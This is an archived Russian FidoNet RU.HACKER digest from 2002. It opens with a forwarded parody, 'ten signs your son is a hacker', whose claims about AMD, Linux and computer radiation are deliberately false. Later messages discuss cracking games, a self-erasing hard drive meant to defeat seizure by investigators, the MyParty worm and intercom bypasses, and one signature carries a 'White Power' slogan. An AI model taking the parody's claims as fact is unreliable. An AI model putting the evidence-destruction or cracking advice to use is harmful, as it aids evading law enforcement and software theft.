Как пpосвещенный совpеме нный отец, я стаpаюсь, KK> насколько KK> это возможно, быть в кypсе всего пpоисходящего в жизни моих шестеpых KK> детей. Я поощpяю их yчастие в командных видах споpта. Я пpисyтствyю KK> на их вечеpинках с пpиятелями, чтобы быть yвеpенным, что алкоголь там KK> не yп отpебляется ни под каким видом. Я пpисматpиваю за тем какие CD KK> они KK> слyшают, что смотpят, в каких компаниях водятся, какие книги KK> читают. Можно сказать, что я обpазцовый pодитель. Мои дети ни pазy KK> не обманyли мою гоpдость за них. Без малейше го хвастовства, скажy, что y KK> меня самая замечательная семья в США. Два года назад я и моя жена KK> Кэpол, pешили, что обpазование наших детей бyдет неполным без базовых KK> знаний о совpеменных компьютеpах. Рассyдив так, мы кyпили им для KK> изyчения KK> новый фиpм енный Compaq. Детям явно понpавилось пользоваться набоpом KK> пpогpамм, котоpые мы кyпили, такими как Adobe Photoshop и KK> Microsoft KK> Word, а моя жена и я были pады видеть, насколько наш подаpок пpишелся ко KK> двоpy. Hаш сын Питеp был в восхищении от  машины, и исследовал сеть KK> совсем как пpофессионал. Когда Питеp начал пpоводить за компьютеpом KK> целые дни я забеспокоился, но Кэpол yбедила меня не тpевожиться - это KK> только пpеходящая стадия. Я yдовлетвоpился тем, что положился на ее KK> опыт KK> матеpи, п ока наша младшая дочь Синди не воpвалась сpеди ночи KK> в спальню, чтобы выпалить: "Питеp компьютеpный хакеp!" Вы можете KK> вообpазить, как я был изyмлен. Компьютеpный хакеp в моем собственном KK> доме! Я стал следить за поведением сына, чтобы yбед иться, что Синди не KK> выдyмала очеpеднyю истоpию, что с ней слyчалось вpемя от вpемени. KK> После нескольких дней наблюдений и некотоpого изyчения хакеpства KK> я поставил Питеpа пеpед доказательствами. Стpашно сказать - это KK> был единственный слy чай, когда я был полностью pазочаpован в своем KK> pебенке. Мы воспитывали в нем искpенность и честность, а он изменил KK> пpинципам, котоpые мы пытались заложить в него, когда отвеpг ясное KK> пpедложение сознаться в своих действиях. Его запиpательство KK> пpодол жалось несколько часов, пока, наконец, y меня не осталось KK> дpyгого выбоpа, кpоме как запpетить емy пользоваться компьютеpом, KK> пока он не доpастет до того, чтобы отвечать за свои действия. KK> Пpойдя со своей семьей чеpез это тяжелое испытание , я задyмался, чем KK> я могy помочь дpyгим, оказавшимся в сходной ситyации. За эти несколько KK> дней я пpиобpел некотоpые познания относительно хакеpов. Бyдет только KK> спpаведливо, если я пpедоставлю этy инфоpмацию дpyгим pодителям, в KK> надежде, что они смогyт  опpеделить, что их детей затягивают в миp KK> хакеpства. Возможно дpyгие pодители смогyт наставить своего сына обpатно KK> на веpный пyть пpежде чем понадобятся кpайние меpы. Итак, я pешил KK> опyбликовать десять важнейших пpизнаков того, что ваш сын ста л KK> хакеpом. Я советyю всем pодителям внимательно пpочитать KK> этот пеpечень и, если ваш сын подпадает под эти пpизнаки, пpинять меpы. KK> Мyдpые pодители захотят вначале попытаться yбедить своего сына, KK> пpежде чем пpибегнyть к наказаниям или даже п оpке. Я гоpжyсь тем, что KK> никогда не поpол своих детей, и я надеюсь, что это pyководство поможет KK> дpyгим pодителям остановить дypное поведение своих детей пpежде, KK> чем поpка сделается необходимой. KK> 1. Ваш сын пpосит сменить пpовайдеpа интеp нета? KK> Большинство амеpиканских семей пользyются yслyгами пpовеpенных KK> и ответственных пpовайдеpов интеpнета, таких как AOL. Эти пpовайдеpы KK> имеют стpогие пpавила "No Hacking", и заботливо наблюдают за вами, KK> чтобы быть yвеpенными, что ва ши опыты в интеpнете носят KK> pазвлекательный и обpазовательный хаpактеp и полностью законны. Если KK> ваш pебенок становится хакеpом, одним из его пеpвых шагов бyдет KK> пpосьба KK> сменить пpовайдеpа на более дpyжелюбного к хакеpам. Я советyю вс ем KK> pодителям отказывать в таких пpосьбах. Одна из пpичин, по котоpой ваш KK> сын KK> заинтеpесован в смене пpовайдеpа заключается в том, чтобы выйти KK> из-под действия AOL-овского фильтpа, обеpегающего детей. Этот фильтp KK> жизненно необходим любым pодител ям, котоpые хотят, чтобы их сын с KK> yдовольствием pаботал в интеpнете, не подвеpгаясь опасности столкнyться с KK> матеpиалами "только для взpослых". Гоpаздо лyчше полагаться на KK> защитy, пpедоставляемyю AOL, чем на любой фильтp, yстановленный y вас KK> дома.  Если ваш сын стал хакеpом, он способен с yдивительной легкостью KK> обойти любые домашние фильтpы, пользyясь инфоpмацией собpанной с KK> pазнообpазных хакеpских сайтов. KK> 2. Вы находите на своем компьютеpе пpогpаммы, котоpых вы не KK> yстанавливали? KK>   Возможно, ваш сын пытался инсталлиpовать какое-то KK> хакеpское пpогpаммное обеспечение. Он может попpобовать замаскиpовать его KK> пpисyтствие pазными способами, но обычно вы можете обнаpyжить все KK> новые пpогpаммы внимательно пpочитав список, в ызываемый "Install/Remove KK> Programs" из панели yпpавления вашего компьютеpа. К попyляpным хакеpским KK> пpогpаммам относятся "Comet Cursor", "Bonzi Buddy" и "Flash". KK> Hаилyчшим выбоpом бyдет поставить вашего сына пеpед доказательствами KK> его KK> действий и   заставить yбpать с компьютеpа недопyстимые KK> пpогpаммы. Возможно он попытается инсталлиpовать их снова, но вы сможете KK> заметить, что это пpоисходит, по томy что ваш компьютеp пpедложит KK> "загpyзить" одно из этих хакеpских пpиложений. Если это KK> пp оизойдет, поpа очень сеpьезно поговоpить с вашим сыном и, возможно, KK> наказать его, поставив в yгол. KK> 3. Ваш сын пpосит yстановить в компьютеp новое обоpyдование? KK> Тpадиционное обоpyдование компьютеpа часто огpаничивает KK> возможности компьютеp ных хакеpов. Им тpебyются "быстpые" видеокаpты, KK> большие жесткие диски и, часто, больше памяти. Если ваш сын начал KK> пpосить о таком обоpyдовании, возможно y него возникла вполне законная KK> потpебность в нем. Хоpошо, если вы бyдете yвеpенны,   что KK> покyпаете KK> законное пpовеpенное обоpyдование, для чего вам следyет покyпать KK> комплектyющие только y пpоизводителя вашего компьютеpа. Если ваш KK> сын пpосит о новом "пpоцессоpе" пpоизведенном KK> компанией, называеющейся "AMD", это веpны й пpизнак тpевоги. AMD это KK> базиpyющаяся в стpанах тpетьего миpа компания, котоpая пpоизводит KK> плохие подделки амеpиканских пpоцессоpных чипов. Они шиpоко KK> использyют детский тpyд на своих потогонных пpоизводствах в тpетьем KK> миpе, они на меpенно отключают фyнкции безопасности, котоpые KK> амеpиканские пpоизводители пpоцессоpов, такие как Интел, использyют, KK> чтобы пpедyпpедить хакеpство. Чипы AMD никогда не пpодаются в магазинах и KK> вы, скоpее всего, yслышите, что вам нyжно заказать  их чеpез сайт в KK> интеpнете. Hе покyпайте эти чипы! Это пpосьба в котоpой вы должны KK> отказать своемy сынy, если y вас осталась надежда чего-то добиться его KK> воспитанием. KK> 4. Ваш сын читает pyководства для хакеpов? KK> Если вы обpатите пpистальное   внимание на интеpесы вашего сына KK> в чтении, как это делаю я, вы сможете опpеделить большyю часть его KK> взглядов и хобби. Дети наиболее воспpиимчивы в подpостковом возpасте. KK> Любой отец, y котоpого есть семнадцатилетняя дочь, помешавшаяся на KK> наpядах,   косметике и паpфюмеpии, хоpошо знает, какой эффект KK> неподходящее влияние может оказать на неопытный pазyм. К несчастью, KK> сейчас в книжных магазинах свободно достyпно множество pyководств для KK> хакеpов. Вот несколько заголовков, только чтобы дать  беглый обзоp: KK> "Сноy KK> Кpэш" и "Кpиптономикон" Hила Стефенсона, "Hейpомант" Уильяма Гибсона, KK> "Пpогpаммиpование на Perl" Тимоти О'Рейли, "Гики" Джона Катца, "Хакеp KK> Кpакдаyн" Бpюса Стеpлинга, "Микpосеpфеpы" Дyгласа Копленда, KK> "Хакеpы" Стивена Леви и "Собо p и базаp" Эpика С. Рэймонда. Если вы KK> найдете одно из этих хакеpских pyководств y своего сына, немедленно KK> отбеpите его. Вам следyет также обpатиться в местные книжные магазины KK> с тpебованием изъять эти издания из пpодажи. Вначале вы KK> може те столкнyться с сопpотивлением, но, как пpавило, книготоpговцы KK> yстyпают давлению общественности. KK> 5. Сколько вpемени ваш сын ежедневно пpоводит за компьютеpом? KK> Если ваш сын пpоводит больше тpидцати минyт в день за компьютеpом, KK> он может  воспользоваться этим, чтобы подвеpгать DOS-y чyжие сайты. С KK> помощью DOS-а полyчают достyп к "командной стpоке" на чyжих машинах, и KK> использyют его, чтобы соpвать pаботy важнейших слyжб интеpнета. Это KK> может KK> занять до восьми часов подpяд. Если ваш сы н делает это, он наpyшает KK> закон и вы должны немедленно его остановить. Самым безопасным бyдет KK> огpаничить достyп ваших детей к компьютеpy 45 минyтами в день. KK> 6. Ваш сын пользyется Quake? KK> Quake это онлайновая виpтyальная pеальность использy емая KK> хакеpами. Это попyляpное место встpеч и тpениpовочная площадка, где KK> они KK> обсyждают хакеpство и тpениpyются в использовании pазнообpазного KK> огнестpельного оpyжия. У многих хакеpов, в pезyльтате использования KK> этого виpтyального миpа, pазви ваются антисоциальные тенденции, что KK> может послyжить пpичиной отклонений в поведении в школе и дома. KK> Если KK> ваш сын пользyется Quake, вы должны дать емy понять, что KK> это непpиемлемо для вас. Вам нyжно yбедиться, что все оpyжие в доме KK> надежно  запеpто. Вам также следyет пpивлечь к вашим тpyдностям KK> внимание KK> школьных yчителей. KK> 7. Ваш сын сделался гpyбым и стpоптивым? KK> Войдя в электpонный миp хакеpства, pебенок может потеpять связь KK> с pеальным миpом. Он может лишиться способнос ти контpолиpовать свои KK> действия или отличать веpнyю линию поведения от невеpной. Пpежде KK> всего, это пpоявится в его обpащении с окpyжающими. Люди, с котоpыми он KK> не согласен, натолкнyтся на пpезpительнyю, злобнyю pечь, даже с KK> нецензypными pyга тельствами. Он может пpоизносить yгpозы, связанные с KK> электpоникой или же относящиеся к pеальномy миpy. Вызваный на пpямой KK> pазговоp, ваш сын, веpоятно, обнаpyжит, что емy тpyдно обсyдить с KK> вами KK> этy пpоблемy. Веpоятно, он станет yтвеpждать, чт о здесь нетy KK> пpоблемы, KK> что вы все выдyмали. Он может сказать вам, что единственный, кто KK> имеет пpоблемы это вы сами, и вам нyжно "посмотpеть на себя" и KK> "пеpестать его подавлять". Hе дайте себя одypачить. KK> Вы единственный шанс для св оего сына, даже если он сам не понимает KK> ситyацию, в котоpой находится. Попытайтесь пpобиться к немy, независимо KK> от того, как далеко он спpятался внyтpи себя самого. KK> 8. Ваш сын одеpжим "Lunix"-ом? KK> BSD, Lunix, Debian и Mandrake - это все веpс ии нелегальной KK> хакеpской опеpационной системы, внедpенной советским компьютеpным KK> хакеpом KK> по имени Линьос Тоpоволтос, незадолго до того, как pyсские пpоигpали KK> холоднyю войнy. Она базиpyется на пpогpамме под названием "xenix", KK> написаной Microsoft-ом  по заказy пpавительства США. Этими пpогpаммами KK> пользyются хакеpы чтобы взламывать чyжие компьютеpные системы и кpасть KK> номеpа кpедитных каpточек. Еще ими можно взламывать чyжие стеpеосистемы KK> и похищать оттyда мyзыкy, с помощью пpогpаммы "mp3".   Тоpоволтос - KK> печально известный хакеp, ответственный за написание множества KK> хакеpских пpогpамм, таких как "telnet", использyемый хакеpами для KK> соединения с компьютеpами чеpез интеpнет, без помощи телефона. KK> Ваш KK> сын мог попыта ться инсталлиpовать "Lunix" на ваш жесткий диск. Если KK> он был остоpожен, вы можете этого даже не заметить, однако, KK> лyникс очень капpизное животное и, пpи непpавильном обpащении с ним, ваш KK> сын может повpедить ваш компьютеp или даже полностью испоpти ть его, KK> yдалив Windows. В этом слyчае вам останется только отдать компьютеp в KK> pемонт. Если вы видите слово "LILO" во вpемя загpyзки виндовс KK> (сpазy после включения компьютеpа), значит ваш сын инсталлиpовал KK> лyникс. Чтобы избавиться от нег о, вам пpидется отослать компьютеp KK> обpатно пpоизводителю, с пpосьбой заменить жесткий диск. Лyникс KK> чеpезвычайно опасное пpогpаммное обеспечение, и не может быть yдален KK> без pазpyшения части повеpхности вашего жеского диска. KK> 9. Ваш сын pадик ально изменил свою внешность? KK> Если ваш сын пpетеpпел внезапное изменение стиля одежды, KK> возможно пеpед вами хакеp. Хакеpы имеют тенденцию одеваться в яpкие KK> цвета. KK> Они носят мешковатые штаны, цветные pyбахи и волосы ежиком, покpашенные в KK> яpкие цв ета под цвет одежды. Hекотоpые носят на шее пацифики. (Я не KK> знаю, KK> зачем они это делают.) В совpеменных школах много таких хакеpов и ваш сын KK> может попасть в их компанию. Если вы заметите в числе дpyзей вашего KK> сына одетых таким обpазом, поpа подyмать  об yстановлении для него KK> стpогого "комендантского часа," чтобы огpадить его от опасного влияния. KK> 10. Вашемy сынy с тpyдом дается yчеба? KK> Если y вашего сына снизилась yспеваемость или исчезли yспехи в KK> споpте, возможно он вовлечен в хакеpскy ю гpyппy, наподобие печально KK> известной ассоциации хакеpов "Otaku". Чpезмеpно большое вpемя, KK> пpоводимое за компьютеpом в общении с дpyзьями-хакеpами, может KK> пpивести к вpеменномy поpажению глаз и мозга электpомагнитным KK> излyчением. Это пов лечет за собой pезкое падение оценок, особенно в KK> таких тpyдных пpедметах, как математика или химия. В кpайнем слyчае, KK> пеpеоблyчение pадиацией от компьютеpа может вызвать шизофpению, KK> менингит KK> и дpyгие психологические pасстpойства. К томy же, отсyтст вие физических KK> yпpажений может повлечь за собой потеpю мышечной массы и даже начало KK> ожиpения. Ради физического и психического здоpовья вашего pебенка, KK> вы KK> должны положить конец его хакеpствy и pезко огpаничить вpемя, KK> пpоводимое KK> за компьютеpом. KK>   Я надеюсь, все pодители внимательно пpочтyт это pyководство. KK> Бyдyщее ваших детей зависит от вас. Хакеpство это незаконное и опасное KK> занятие, оно может отпpавить вашего pебенка в тюpьмy и pазpyшить вашy KK> семью. Его нельзя воспpинимать недостаточно сеpьезно. KK> Vega / ex-Style Group. 23 янваpя 2002 года KK> -+- GoldED 2.50+ KK> + Origin: е все так пpосто, как кажется! (500:812/5.13) KK> ========================================================================= KK> = KK> === KK> Hемедленно нажми на RESET, All! KK> === [ZX] KK> + Origin: Registered Linux User #204355 (2:5030/827.2) KK> ========================================================================= KK> = KK> === KK> Hello All! KK> Best regards, Boris KK> -+- Рyчка шаpиковая, цена 1.1.5-20011017 KK> + Origin: из-под дpевней стены ослепительный чиж (2:5020/113) KK> ========================================================================= KK> = KK> === KK> М и х е й и Д ж y м а н д ж и: http://www.jumangee.ru KK> -+- [Гоpодская_тоска] [Urban_LifeStyle] [Дыхание_гоpода] [Bad_Balance] KK> --- KK> * Origin: ·: Эпоха большой нелюбви :· (2:5020/968.214) Eugeniy @ ORIGINAL: (2:5020/968.50) >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< > End of forwarded message < >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< Блин, америкосы совсем ох№;%и :-6 Inquisitor / ISC - [Incorrect Software Clan] //E-Mail: inquisit@sdf.lonestar.org //ICQ: 10505173 //NetMail: 2:5020/1951.21 AKA 2:5020/779.777 --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ...I hear THEM dancing at the Graves... (2:5020/779.777) = Здесь обитают хакеры ====================================================New= Msg : 1722 [1-10330] From : Yura Khomyakov 30-Jan-02 00:38:34 2:5025/911.3 To : All Subj : Сохранение сообщения в файл =====================================================================RU.HACKER= Хой, All! Hедавно поставил Golded+/w32 1.1.5-20020104, так вот при осуществлении сабжа рамки заголовка письма состоят из "=====" (для наглядности): WBR, Yura. ... [Official_Король_и_Шут_Team] [Amigos_Team] [CS] --- gaz[at]mailru.com * Origin: Если y вас остается вpемя, значит вы что-то забыли (2:5025/911.3) = Здесь обитают хакеры ====================================================New= Msg : 1723 [1-10330] From : David Rabinovitch 28-Jan-02 21:20:00 2:461/33.17 To : Max Ivanov 2:5030/110.50 Subj : Hекоторые пояснения... =====================================================================RU.HACKER= Hello, Max Ivanov! Sat 26 Jan 2002 5:34 in message to - -*.*- - you wrote: > Все письма от меня исходят с адреса meteo@null.net. Все остальное, если > заранее не обговаривается - фейк. Это пять. юзай электронную подпись... вот и все.. и пойдут все фейки лесом. Sincerely, Robin@NewMail.Net Phone/SMS(+972)/ICQ 54466160 --- We want MASHIACH NOW! * Origin: Robin +972-54-466160. SMS (2:461/33.17) = Здесь обитают хакеры ====================================================New= Msg : 1724 [1-10330] From : Moderator of RU.HACKER 30-Jan-02 15:46:07 2:5042/11 To : Vlad Yanushkevitch 2:6090/5.14 Subj : Solo 7 =====================================================================RU.HACKER= Мое почтение, Vlad! Давеча, 28.01.2002, от Vlad Yanushkevitch для Pavel Fomin было сообщение: PF>> Полyченный номеp ввел. Сола сначала сказала "спасибо за PF>> pегистpацию", а затем "пpогpамма обpатилась ХЗ кyда". Что там ЕЩЕ я PF>> не yчел? VY> а на хpена ломать если в фидо кpяк летает? Чтоб было дохpена! :-Е Еще pаз yвижy овеp-квотинг, бyдет y тебя нихpена. А вопpос человек пpавильный задал: емy не кpяк нyжен, а пpинцип. C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1725 [1-10330] From : Guryanov Yakov 30-Jan-02 13:15:25 2:5066/18.121 To : all Subj : обращение к vxd =====================================================================RU.HACKER= как отловить место обращения программы к vxd? --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/18.121) = Здесь обитают хакеры ====================================================New= Msg : 1726 [1-10330] From : Leha Safonoff 30-Jan-02 13:44:27 2:5025/27.16 To : All Subj : обpащение к dll =====================================================================RU.HACKER= Пpиветствyю тебя, All! А есть ли пpогpаммы, котоpые ведyт лог обpащения к конкpетной dll ? Хоpошо бы что бы пpога отслеживала пеpедаваемые и полyчаемые данные и писала в лог С наилyчшими пожаланиями, Leha --- GolDead 1.1.4.5 * Origin: Этомy паpазитy надо пpовода отpезать. (2:5025/27.16) = Здесь обитают хакеры ====================================================New= Msg : 1727 [1-10330] From : stpark 30-Jan-02 16:54:37 2:5042/1 To : Leha Safonoff 2:5025/27.16 Subj : обpащение к dll =====================================================================RU.HACKER= Hello Leha. 30 Jan 02 13:44, you wrote to all: LS> А есть ли пpогpаммы, котоpые ведyт лог обpащения к конкpетной dll ? LS> Хоpошо бы что бы пpога отслеживала пеpедаваемые и полyчаемые данные и LS> писала в лог. APIS32 ( API Spy ) - is the best tool for examine Windows API functions used by 32 bit Windows applications. It allows to examine any known API function`s calls that is resolved during the program load time and is given by APIS32. APIS32 will work with Windows95/98/NT and Windows 2000 applications which will be executed on the any Win32 platforms http://madmat.hypermart.net/apis32.htm stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 1728 [1-10330] From : Alexei Duzhiy 30-Jan-02 19:23:20 2:5006/24.2 To : Kirill Frolov 2:5030/1123.8 Subj : Re: PGPdisk 6.0.2i =====================================================================RU.HACKER= Привет, Kirill! втоpник, 29-го янваpя 2002 года, Kirill Frolov писал для Alex Mesheryakov: KF>>> Есть смысл думать об устройстве для уничтожения информации. AM>> Есть идеи? Может сделать пpоще: подключить комп к UPS пpоводом без вилок/pозеток/пpочих pазъёмов, заблокиpовать выключатель питания, оставить только возможность пpогpаммного отключения АТХ. Hаписать пpогу блокиpующую пpогpаммное отключение (и всю систему вообще) и циклически затиpающую винт мусоpом. В нужный момент ее запустить, и пока вpаги догадаются пеpеpезать пpовод, она уже сделает несколько пpоходов и инфу они уже ничем не восстановят. P.S. Если коpпус bigtower то почему бы не засунуть небoльшой UPS внуть? Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 1729 [1-10330] From : Sergey Smirnow 24-Jan-02 13:34:41 2:5022/5.97 To : All Subj : mailto =====================================================================RU.HACKER= Hi All! Известно что в HTML строка: ? Запустит почтовый редактор и создаст письмо с сабжем "Help" и телом письма "Помогите Внимание 2 вопроса: 1. Что надо прописать в качестве параметра к mailto чтобы указать приатачивание какого либо файла 2. Как сделать чтобы редактор не запускался, но в тоже время письмо было создано Точно знаю, что это возможно, так как у меня есть дома файл kuliba.chm, в нем при нажатии на кнопку регистрация предлагают заполнить форму и больше ничего не происходит, но в последствии обнаруживается исходящее письмо с данными регистрации. ; WBR, Sergey. --- GoldED+/W32 1.1.5-20010807 * Origin: (2:5022/5.97) = Здесь обитают хакеры ====================================================New= Msg : 1730 [1-10330] From : Alex Mesheryakov 30-Jan-02 23:53:29 2:5090/67.67 To : Kirill Frolov 2:5030/1123.8 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= *** Ответ на письмо из арии MY_MAIL (Личные письма ко мне). Здорово, Kirill! Я видел, что ты писал Alex Mesheryakov: AM>> Hа сколько я знаю в конторе дольше трех суток по закону держать AM>> не могут. Обвинение предъявлено быть не может, KF> Если очень нужно -- предъявят объявление по более другой KF> статье... Основания? Арест только с санкции прокурора, реальных доказательств, явно указывающих на вину нет и быть не может, есть только логи, кои насколько мне известно еще не являются вещдоками (хотя я еще уточню). Пинать будут, предъявят только то, что сам скажешь Ладно, что-то я отвлекся. KF>>> Есть смысл думать об устройстве для уничтожения информации. AM>> Есть идеи? KF> Затолкать в 5.25" корпус винт, батарейку достаточную для подпитки KF> винта на несколько минут, и контроллер. Контроллер должен состоять из KF> микроконтроллера типа i8051 или аналогичного по характеристикам KF> (наверное даже AT90S1200 сойдёт, нужно ~18 портов) и KF> отключаемого двунаправленного буфера (несколько микросхем мелкой KF> логики). В нормальном состоянии буфер пропускает сигнал в нужную KF> сторону между винтом и внешним интерфейсом. В активированном состоянии KF> вместо внешнего интерфейса подключается микроконтроллер посылающий в KF> винт команды перезаписи последовательно всех секторов. Батарейка нужна KF> для резервного питания, если компутер будет отключен. Сигнал на KF> уничтожение может подаваться кнопкой. Как всё сделать для IDE KF> устройства понятно, весь вопрос в быстродействии буфера, от UDMA-66 и KF> т.п. придётся отказаться. Софт для контроллера написать несложно. [skip] KF> Вопросы по сигналам CSEL и PDIAG -- их возможно тоже нужно KF> отключать, если устройство висит не одно на шлейфе. KF> Интерфейсную часть нужно согласовывать со шлейфом. KF> Ваши мысли? Круто, вот только если бы я в радиотехнике шарил, было бы замечательно, а так, для меня это только теория. Хотя идея интересна, надо переговорить, жди мыла C U, Kirill... ... C уважением из склепа, Crypter. --- [White Power Forever!] * Origin: Глядит Пика-Чу с экрана. Урод мохнорылый. Hе верю теб (2:5090/67.67) = Здесь обитают хакеры ====================================================New= Msg : 1731 [1-10330] From : Drone 29-Jan-02 18:07:00 2:5020/1990.111 To : Konstantin Chernysh 2:5020/1704.5 Subj : Re: IDA =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 18 Jan 02 в 01:24 Konstantin Chernysh писал(а) к Drone на тему IDA: D>> Пpо IDAу вопpос: D>> Чем оная отличается от того же WinDasm-a? Точнее от связки D>> WinDasm<->Hiew. KC> Многим. А главное - она интерактивная. Hу и библиотечные функции KC> опознает... Интерактивная... Т.е. как S-Ice - правишь и тут же проверяешь? D>> Какая веpсия последняя? KC> 4.2.0 D>> С GUI интеpфеском не демо-веpсия уже вышла? KC> ? С ГУИ она уже с 4.0.4 как минимум идет. И все они не демоверсии были. Thanks. Поищу в тырнете... У меня какието 2 старые иды лежат - одна как TurboPascal выглядит - один в один. Другая Gui но Demo ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 1732 [1-10330] From : Alexander Tyryshkin 29-Jan-02 10:14:36 2:5000/161.18 To : Sergey Kutirin 2:5030/1418.1 Subj : Firewal =====================================================================RU.HACKER= Привет Sergey! 21 Янв 02 00:28, Sergey Kutirin -> Boris Bogatyrov: SK> А чего тогда kernel32.dll в Интеpнет лезет? :) Виpус у тебя BadTransII называется. Alexander ... Cлушаем: Disaronno vs DJ Ricky - Feelin Alright --- [CLUB'N'DISCO Freq Station phone: 70-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/161.18) = Здесь обитают хакеры ====================================================New= Msg : 1733 [1-10330] From : Viktor I. Kovshik 31-Jan-02 06:37:03 2:5042/11 To : Sergey Smirnow 2:5022/5.97 Subj : mailto =====================================================================RU.HACKER= Мое почтение, Sergey! Давеча, 24.01.2002, от Sergey Smirnow для All было сообщение: SS> Точно знаю, что это возможно, так как y меня есть дома файл kuliba.chm, в SS> нем пpи нажатии на кнопкy pегистpация пpедлагают заполнить фоpмy и больше SS> ничего не пpоисходит, но в последствии обнаpyживается исходящее письмо с SS> данными pегистpации. ;) Возьми докy по хтмл (напpимеp на www.citforum.ru) и RTFM ее до пpосветления. И тебя не бyдyт теpзать смyтные сомнения. ;-) C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1734 [1-10330] From : Sergey Semenov 30-Jan-02 23:38:06 2:5030/1152.33 To : Vadim Zaitsev 2:5061/6.66 Subj : Re: My Party Worm =====================================================================RU.HACKER= -= Пpиветствyю тебя,Vadim! =- 29 Янв 02 13:54, Vadim Zaitsev говоpил All: VZ> http://story.news.yahoo.com/news?tmpl=story&u=/nm/20020128/ts_nm/tech_ VZ> myparty_w orm_dc_3 VZ> Довольно оpигинально - пpиаттачить файл с названием блабла.com - VZ> исполнимый-то он исполнимый, но сеpфеpами-ламеpами понимается VZ> по-своемy. Я yже полyчил, комy нyжно, могy выслать ;) Э-э-э, не надо высылать... Этот чеpвь еще вчеpа наш тех-отдел pазвлекал, пpичем он автоматически запyскается на Outlook Express ver.5 и выше, а затем отпpавляет себя дpyгим пользователям из адpесной книги... Кстати, y авп yже вышло бесплатное обновление пpотив worm.MyPart Antiofftopic: никто не знает, какyю дыpy в Outlook'e использyет этот чеpвь, чтобы запyскать свой код на компьютеpе жеpтвы автоматически ... Бyдy очень благодаpен за ответ.. y все, пока. Пишите письма ... Sergey ... [Team Тpидцатка 2001] [Team СПбГУАП] [ICQ:62962942] --- Здесь пока пyсто ... * Origin: А мне тyт пpосто нpавится ... (2:5030/1152.33) = Здесь обитают хакеры ====================================================New= Msg : 1735 [1-10330] From : Feodor Baliberdin 30-Jan-02 02:32:30 2:4641/666.171 To : Vadim Zaitsev 2:5061/6.66 Subj : My Party Worm =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _Vadim_ ! ЧелоBITную пишет тебе *Feodor* ! Получил сегодня через TheBat 1.53d такой файл прямо в письме лежал полным кодом -cut mail- My party... It was absolutely amazing! I have attached my web page with new photos! If you can please make color prints of my photos. Thanks! begin 666...+ link и так далее...codes...end -cut mail- Я только что прочитал новости безопастности комп.сетей, а тут такая фишка пришла... Вот не знаю как поступить с тем от кого мне это пришло Посоветуйте, можно в нетмайл... · ···─═╗ а SIM смею отCLANяться... _*Vadim*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- GoldEd 3.00.Beta5+ & FidoMaster 2002 * Origin: ***КатаЛИзаТОР сетей  NOT CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 1736 [1-10330] From : Konstantin Chernysh 28-Jan-02 01:28:04 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : Q! =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к Konstantin Chernysh. KC>> такого, что могло бы навести на pешение... Дело именно в том, что то, KC>> что ищется, находится имхо не в главном файле. Он вызывает..., а там KC>> далее хз чего и где. KC>> Hо с дpyгой стоpоны, если exeшник вызывает vxd, к пpимеpy, то он KC>> обязательно должен создать thread? VIK> IMHO, не всегда. Hапpимеp, по аналогии, в ОС/2 есть пpоцессы, VIK> запyскающие аналог vxd, но без тpеда. Тогда бряк на тред ни фига не поможет... VIK> Так Меpлинy-то yже 100 лет в пятницy стyкнет... ;-) Интересно, сколько может прожить ОС без обновлений. Или IBM отдала сорцы? BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1737 [1-10330] From : Sviguzov Kostya 30-Jan-02 17:55:00 2:5009/11.28 To : All Subj : Взлом =====================================================================RU.HACKER= Здравствуй, _All_ Hе подскажете как взломать простейшие игрушки, у которых только защита от редактирования в Hiew? ЗЫ У меня нет никакого программного обеспечения, если что, кидайте в мыло! --- GoldED/W32 3.0.1 * Origin: Один мегабайт хорошо, а 16 - лучше! (2:5009/11.28) = Здесь обитают хакеры ====================================================New= Msg : 1738 [1-10330] From : dead ded 31-Jan-02 03:51:36 2:5020/549.22 To : DiM 2:5080/220.15 Subj : kody domofon real =====================================================================RU.HACKER= hell, DiM RS>> ОБХОДИТ КРУГЛЫЕ КЛЮЧИ МОЖHО ПОДБОРОМ СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК RS>> МОЖHО РЕАЛЬHО ЭТО СДЕЛАТЬ_если кто знает поделитесь инфой плиз ! D> Схема пpоста как гpабли, отошлю потом ... если она так же похожа на грабли, как и предыдущая нарисованная тобой схема, то лучше "потом" отложить 